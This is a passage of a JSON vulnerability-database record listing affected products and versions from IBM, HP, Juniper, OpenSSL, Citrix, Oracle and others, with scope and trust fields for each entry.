        "vendor": "juniper",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.4"
      },
      {
        "model": "command center appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "junos 14.1r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flashsystem 9843-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.27"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.11"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2.27"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.4.1.8"
      },
      {
        "model": "linux enterprise server sp2 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.8"
      },
      {
        "model": "project openssl 1.0.1g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.15"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.4"
      },
      {
        "model": "communications security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.0"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4"
      },
      {
        "model": "db2 connect application server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "project openssl 0.9.8m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.2"
      },
      {
        "model": "project openssl j",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "junos 12.3x48-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.4"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.13"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.5"
      },
      {
        "model": "tivoli endpoint manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50001.1"
      },
      {
        "model": "sterling connect:enterprise for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5.0.0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.16"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.5"
      },
      {
        "model": "flashsystem 9848-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "elastic storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.3"
      },
      {
        "model": "general parallel file system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.8"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "db2\u00ae connect? unlimited edition for system z\u00ae",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "cloud orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0.3"
      },
      {
        "model": "db2\u00ae connect? enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.210"
      },
      {
        "model": "cloud orchestrator enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4"
      },
      {
        "model": "netscaler gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sdk for node.js for bluemix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0.10.38"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.9"
      },
      {
        "model": "security appscan enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.12"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.1"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.913"
      },
      {
        "model": "system networking rackswitch g8316",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.14.0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.2.0.8"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "db2 advanced workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "rational developer for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.1.3"
      },
      {
        "model": "cloud orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0.2"
      },
      {
        "model": "junos 12.3x48-d20",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "websphere transformation extender secure adapter collection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.1.1"
      },
      {
        "model": "infosphere master data management patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.33"
      },
      {
        "model": "junos 12.3r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl 1.0.1n",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational developer for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.11"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5600v310.1"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "sametime unified telephony",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.10"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.15"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.9"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.6"
      },
      {
        "model": "rational requisitepro",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.18"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "junos d30",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x44"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.5"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "db2 workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.0.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.211"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.4.19"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.6"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.9"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.10"
      },
      {
        "model": "db2 connect unlimited edition for system i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "sterling connect:enterprise for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.4.03"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.4"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "project openssl 0.9.8r",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security appscan enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.3"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.7"
      },
      {
        "model": "db2 connect? application server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "sdk for node.js",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.3"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "junos 15.1r2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.16"
      },
      {
        "model": "project openssl 0.9.8n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2"
      },
      {
        "model": "abyp-2t-1s-1l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "general parallel file system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.6"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.2.0.3"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.3"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "security network controller 1.0.3350m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.2.0.3"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.1"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.03"
      },
      {
        "model": "junos 14.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.4.1.8"
      },
      {
        "model": "system networking rackswitch g8264t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.14.0"
      },
      {
        "model": "tealeaf customer experience",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "smartcloud provisioning for software virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "sterling connect:enterprise for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.4.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.4.1.8"
      },
      {
        "model": "rational policy tester",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "db2\u00ae enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "junos 14.1r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.1"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.213"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.10"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.12"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50006.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.5"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.6"
      },
      {
        "model": "netscaler application delivery controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "general parallel file system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.0"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.1"
      },
      {
        "model": "abyp-2t-1s-1l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "project openssl 1.0.2b",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system networking rackswitch g8052",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.11.5.0"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1.4"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.68"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.2"
      },
      {
        "model": "system networking rackswitch g8052",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.11.4.0"
      },
      {
        "model": "fortimail",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.10"
      },
      {
        "model": "abyp-10g-2sr-2lr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.9"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.4"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.3"
      },
      {
        "model": "project openssl 0.9.8p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.5"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.1"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "junos 13.3r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.5"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.4"
      },
      {
        "model": "junos 12.3r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.01"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.14"
      },
      {
        "model": "tealeaf customer experience",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "8.54"
      },
      {
        "model": "abyp-2t-2s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security proventia network enterprise scanner",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "security access manager for web appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "sterling connect:enterprise for unix ifix03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5.0.3"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0.1"
      },
      {
        "model": "cloud orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.5"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.8"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.7"
      },
      {
        "model": "tivoli netcool system service monitor fp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "junos 12.1x46-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "worklight consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.08"
      },
      {
        "model": "system networking rackswitch g8264cs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.8.11.0"
      },
      {
        "model": "gpfs storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.1"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.9.1"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.06"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.18"
      },
      {
        "model": "db2\u00ae workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.3"
      },
      {
        "model": "general parallel file system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.0.28"
      },
      {
        "model": "security network controller 1.0.3387m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.4"
      },
      {
        "model": "junos 12.1x44-d55",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos d40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x44"
      },
      {
        "model": "junos 12.1x44-d30.4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "db2\u00ae connect? enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "system networking rackswitch g8052",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.15.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "junos 15.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network controller 1.0.3379m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.8"
      },
